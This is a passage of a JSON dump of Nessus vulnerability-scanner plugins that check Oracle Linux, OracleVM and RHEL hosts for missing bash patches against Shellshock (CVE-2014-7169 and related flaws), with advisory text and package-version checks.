flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:37", "description": "Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bash (ELSA-2014-3077)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-3077.NASL", "href": "https://www.tenable.com/plugins/nessus/77893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3077.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77893);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3077)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004483.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:08", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - (CVE-2014-7169) Resolves: #1146322", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : bash (OVMSA-2014-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2014-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/78237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0021.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78237);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.3 : bash (OVMSA-2014-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - (CVE-2014-7169) Resolves: #1146322\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000222.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dadbd467\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:29:29", "description": "Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3079.NASL", "href": "https://www.tenable.com/plugins/nessus/77953", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3079.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77953);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004493.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.3.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3078.NASL", "href": "https://www.tenable.com/plugins/nessus/77894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77894);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3078)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004482.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:47", "description": "An updated rhev-hypervisor6 package that fixes several security issues is now available.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1568", "CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1354.NASL", "href": "https://www.tenable.com/plugins/nessus/79053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1354. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79053);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2014-1568\",\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"RHSA\", value:\"2014:1354\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An updated rhev-hypervisor6 package that fixes several security issues\nis now available.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation\nOne) input from certain RSA signatures. A remote attacker could use\nthis flaw to forge RSA certificates by providing a specially crafted\nsignature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting\nCVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product\nSecurity Incident Response Team as the original reporters of\nCVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were\ndiscovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1354\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-1568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rhev-hypervisor6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 